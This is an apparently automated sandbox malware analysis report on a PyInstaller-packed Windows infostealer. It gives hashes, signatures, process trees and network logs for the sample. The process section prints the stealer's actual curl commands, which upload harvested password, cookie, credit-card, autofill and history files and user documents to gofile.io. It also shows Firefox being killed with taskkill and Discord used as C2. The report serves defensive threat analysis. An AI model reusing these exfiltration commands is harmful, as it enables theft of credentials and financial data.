Malware Analysis Report

2024-11-30 13:00

Sample ID 240605-kvklvscb92
Target 2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk
SHA256 94570010902d816cf8b2be7294bcb0bb594088e4ffc067845c58c0b54d0f9159
Tags
pyinstaller spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

94570010902d816cf8b2be7294bcb0bb594088e4ffc067845c58c0b54d0f9159

Threat Level: Shows suspicious behavior

The file 2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk was found to be: Shows suspicious behavior.

Malicious Activity Summary

pyinstaller spyware stealer

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Detects Pyinstaller

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-05 08:57

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-05 08:55

Reported

2024-06-05 09:00

Platform

win7-20240221-en

Max time kernel

121s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe"

C:\Users\Public\Downloads\GMplop.exe

"C:\Users\Public\Downloads\GMplop.exe"

C:\Users\Public\Downloads\GMplop.exe

"C:\Users\Public\Downloads\GMplop.exe"

Network

N/A

Files

C:\Users\Public\Downloads\GMplop.exe

MD5 bffdd33ee97171012d7fa502e4b9b2b3
SHA1 5aa123c075d0e818cb5783e96d6a03c1d11ce1c7
SHA256 768f4980cb610e2fa58bc3021b71108bc462bc2c2514fa3217ef2a21ade24825
SHA512 22d5f0d79c3a96413b98598436c7598d98dc73fa3c2f9c55647ba5fc911e8d982ead2d3599e914927042e457497de55a29d5b9cfad6777c82655dba6ce712ed5

C:\Users\Public\Downloads\GMplop.exe

MD5 47334ef25c4ba77c11c71b1a06802ff7
SHA1 1c00466e6e6976ae79f61ecbf486170ff79b1c5d
SHA256 87bf29d40ff1de20fad5d30df94b5a5268b992b5dc9c9c846324356ef29f2eda
SHA512 684026a1dbff31c11305b398a602b02c223db4501e3281c454e5d69294d11df29f98ef82bc933df609691882ebf57d57af80ed6466426a9fb25926e75511f503

memory/2184-47-0x00000000024C0000-0x00000000024D0000-memory.dmp

C:\Users\Public\Downloads\GMplop.exe

MD5 86425db6dcdfabf1b93ae4e0932480b6
SHA1 00f38f91bb47193cb05c2a73ba79a0054d1316c9
SHA256 4ffe632977bb608ff8a9ab3afdcfd2d3f45357544fb52f70a1ff86a8f5e93e1b
SHA512 152f5a162aed2d121020b7d9cd52cc0397522870ead524ced925b02baa4a3ae65c2064e980ed58e0ff038b43cc4fd023be394a461232617b0c1c2381d5af5854

C:\Users\Admin\AppData\Local\Temp\_MEI24722\ucrtbase.dll

MD5 9679f79d724bcdbd3338824ffe8b00c7
SHA1 5ded91cc6e3346f689d079594cf3a9bf1200bd61
SHA256 962c50afcb9fbfd0b833e0d2d7c2ba5cb35cd339ecf1c33ddfb349253ff95f36
SHA512 74ac8deb4a30f623af1e90e594d66fe28a1f86a11519c542c2bad44e556b2c5e03d41842f34f127f8f7f7cb217a6f357604cb2dc6aa5edc5cba8b83673d8b8bd

\Users\Admin\AppData\Local\Temp\_MEI24722\api-ms-win-core-processthreads-l1-1-1.dll

MD5 a55abf3646704420e48c8e29ccde5f7c
SHA1 c2ac5452adbc8d565ad2bc9ec0724a08b449c2d8
SHA256 c2f296dd8372681c37541b0ca8161b4621037d5318b7b8c5346cf7b8a6e22c3e
SHA512 c8eb3ec20821ae4403d48bb5dbf2237428016f23744f7982993a844c53ae89d06f86e03ab801e5aee441a83a82a7c591c0de6a7d586ea1f8c20a2426fced86f0

C:\Users\Admin\AppData\Local\Temp\_MEI24722\python310.dll

MD5 8640d85afe0bf333d001bbce43434eb5
SHA1 93821eaae9c88de13133827e8b38c95a5f181618
SHA256 167688523ebdb28e0608a8376bc63e7db1bb1ec34667e448cf12aba76a40202b
SHA512 5e395f95baa0239f3b25c7fcf1867bae621ad7041e0c20ba43ecdbe007b888533230aad54f08523ea26093235b7e94c4da1714bd6e550c440a21b3e89931c0a2

\Users\Admin\AppData\Local\Temp\_MEI24722\api-ms-win-core-file-l2-1-0.dll

MD5 c3408e38a69dc84d104ce34abf2dfe5b
SHA1 8c01bd146cfd7895769e3862822edb838219edab
SHA256 0bf0f70bd2b599ed0d6c137ce48cf4c419d15ee171f5faeac164e3b853818453
SHA512 aa47871bc6ebf02de3fe1e1a4001870525875b4f9d4571561933ba90756c17107ddf4d00fa70a42e0ae9054c8a2a76d11f44b683d92ffd773cab6cdc388e9b99

\Users\Admin\AppData\Local\Temp\_MEI24722\api-ms-win-core-timezone-l1-1-0.dll

MD5 e8af200a0127e12445eb8004a969fc1d
SHA1 a770fe20e42e2bef641c0591c0e763c1c8ba404d
SHA256 64d1ca4ead666023681929d86db26cfd3c70d4b2e521135205a84001d25187db
SHA512 a49b1ce5faf98af719e3a02cd1ff2a7ced1afc4fbf7483beab3f65487d79acc604a0db7c6ee21e45366e93f03fb109126ef00716624c159f1c35e4c100853eaf

\Users\Admin\AppData\Local\Temp\_MEI24722\api-ms-win-core-file-l1-2-0.dll

MD5 1f72ba20e6771fe77dd27a3007801d37
SHA1 db0eb1b03f742ca62eeebca6b839fdb51f98a14f
SHA256 0ae3ee32f44aaed5389cc36d337d57d0203224fc6808c8a331a12ec4955bb2f4
SHA512 13e802aef851b59e609bf1dbd3738273ef6021c663c33b61e353b489e7ba2e3d3e61838e6c316fbf8a325fce5d580223cf6a9e61e36cdca90f138cfd7200bb27

\Users\Admin\AppData\Local\Temp\_MEI24722\api-ms-win-core-localization-l1-2-0.dll

MD5 75ef38b27be5fa07dc07ca44792edcc3
SHA1 7392603b8c75a57857e5b5773f2079cb9da90ee9
SHA256 659f3321f272166f0b079775df0abdaf1bc482d1bcc66f42cae08fde446eb81a
SHA512 78b485583269b3721a89d4630d746a1d9d0488e73f58081c7bdc21948abf830263e6c77d9f31a8ad84ecb5ff02b0922cb39f3824ccd0e0ed026a5e343a8427bc

\Users\Admin\AppData\Local\Temp\_MEI24722\python310.dll

MD5 fab738f02e477be53d03d8f40796a7dc
SHA1 9e1c19a6f33f79b933fafe251ea4bb78ed55ff30
SHA256 08e6a5940d7f8ef7bbf17e4df991133f918df94f3932faeede238acfca70002b
SHA512 df861e53c6aa796aca380c39b3c395a9889e4ecd4ef8612a53b5c5d05abc4f3390b4ee56cb134ba5a789083523985a694d600ffed2cad77ff5d747411eb5f370

\Users\Public\Downloads\GMplop.exe

MD5 ab884918a8927d503ef69bccc6239f99
SHA1 7947e3dabf59c952f14b5c24596e6d973e6d416f
SHA256 92beb7d384c135835ac789a9de8cac8a80f66ce75d92813779918fcd1f0dbe02
SHA512 613c444eb9e7c781528cad2271d8e334b59fd55ceb3d307efe24d7efa4e001df38cc1eae243f6e58e408afeb8b42cb2facbca99d6ea783977d3cbdc362a54ebe

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-05 08:55

Reported

2024-06-05 09:00

Platform

win10v2004-20240508-en

Max time kernel

130s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A
N/A N/A C:\Users\Public\Downloads\GMplop.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe C:\Users\Public\Downloads\GMplop.exe
PID 2236 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe C:\Users\Public\Downloads\GMplop.exe
PID 364 wrote to memory of 1740 N/A C:\Users\Public\Downloads\GMplop.exe C:\Users\Public\Downloads\GMplop.exe
PID 364 wrote to memory of 1740 N/A C:\Users\Public\Downloads\GMplop.exe C:\Users\Public\Downloads\GMplop.exe
PID 1740 wrote to memory of 4436 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 4436 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 2468 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 2468 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 2468 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2468 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1740 wrote to memory of 3864 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 3864 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 3864 wrote to memory of 912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3864 wrote to memory of 912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 1744 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 1744 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1744 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 220 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 220 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 220 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 220 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 3932 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 3932 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 3932 wrote to memory of 2668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3932 wrote to memory of 2668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 3036 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 3036 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3036 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 4736 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 4736 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 4736 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4736 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 4764 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 4764 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4764 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 1148 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 1148 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 2484 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 2484 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1148 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1148 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2484 wrote to memory of 3488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2484 wrote to memory of 3488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1740 wrote to memory of 2760 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 2760 N/A C:\Users\Public\Downloads\GMplop.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2760 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2024-06-05_3e9a614792be8aa430af223b03ea38be_cova_ryuk.exe"

C:\Users\Public\Downloads\GMplop.exe

"C:\Users\Public\Downloads\GMplop.exe"

C:\Users\Public\Downloads\GMplop.exe

"C:\Users\Public\Downloads\GMplop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokpasswords.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokpasswords.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokcookies.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokcookies.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokcreditcards.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokcreditcards.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokautofill.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokautofill.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokhistory.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokhistory.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokparsedcookies.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokparsedcookies.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokbookmarks.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\havokbookmarks.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/CompareSave.midi" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/EnterBackup.tif" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/CompareSave.midi" https://store1.gofile.io/uploadFile

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/EnterBackup.tif" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/UnprotectPing.csv" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/UnprotectPing.csv" https://store1.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store1.gofile.io udp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 227.123.112.45.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
BE 88.221.83.234:443 www.bing.com tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 234.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 162.107.17.2.in-addr.arpa udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp

Files

C:\Users\Public\Downloads\GMplop.exe

MD5 33a45d99d1e11518bf2e5c76ab2dc5e5
SHA1 535c1c1649cfa994a27a9bdd0a4d9af4e9888c35
SHA256 cd47c791e6f48c24a35cd7e591985242be8f48d5879ee5ca3cab762cf50094cc
SHA512 c9b06236584ad3325f0586dd18320300c1f4a07ed5d0ed5164bfc4b3000e88c28b3132f10298cdd952430376b9d95f79628af5d64e1be53e4ec9f1c178d65eb7

C:\Users\Public\Downloads\GMplop.exe

MD5 6c35d34b18471ed654f4ff9513969dc8
SHA1 109ba7115659a980ab485a9e76b0fcbf101bbbb5
SHA256 55388b38fce77c7393e641babaee91160795a4b8dac514c3e411e68999b689e4
SHA512 f47edc29f55b34af91d9e70f46683bff0bdbd5ee87bc999db1dd58d450c5bfab63aeb398dcd4c9c5049447cca152b8c25ec82a31ae0773e0af24cf0e56a74030

C:\Users\Public\Downloads\GMplop.exe

MD5 7818a42c79ef4dd1914b06ef2c272742
SHA1 2ec2713d68022bf1d27f8b29c21dbd66f01adb90
SHA256 d386ec4fcb19545583eda210d7fd63b23177b785371ee477e58913e3bfd35032
SHA512 9be2e8099d17e14ec37ed4210492b2a8e1a2830b25de12ce216723d123229975700559f15b281e0c4b2666b6e847ddfb63f07eb988b19ee85c8160946527156d

C:\Users\Admin\AppData\Local\Temp\_MEI3642\ucrtbase.dll

MD5 9679f79d724bcdbd3338824ffe8b00c7
SHA1 5ded91cc6e3346f689d079594cf3a9bf1200bd61
SHA256 962c50afcb9fbfd0b833e0d2d7c2ba5cb35cd339ecf1c33ddfb349253ff95f36
SHA512 74ac8deb4a30f623af1e90e594d66fe28a1f86a11519c542c2bad44e556b2c5e03d41842f34f127f8f7f7cb217a6f357604cb2dc6aa5edc5cba8b83673d8b8bd

C:\Users\Public\Downloads\GMplop.exe

MD5 41be74ea7ef9742163951b7ca9d3b546
SHA1 0a73a25443e052ce5b82d12cb66c18757fc0b0ba
SHA256 852fe75e4046ece9b53cf5b796e2070082af43d6360797735c26fc514d4f6d7c
SHA512 b3204c5d4e632d691879f77cc5c2af7949ff009fb21efb2912b4d39e4d6655d2bae9bcea162fb9c706f7bf25381c66e096c128e832885508c00424aa5053305e

C:\Users\Admin\AppData\Local\Temp\_MEI3642\python310.dll

MD5 c80b5cb43e5fe7948c3562c1fff1254e
SHA1 f73cb1fb9445c96ecd56b984a1822e502e71ab9d
SHA256 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20
SHA512 faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

C:\Users\Admin\AppData\Local\Temp\_MEI3642\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
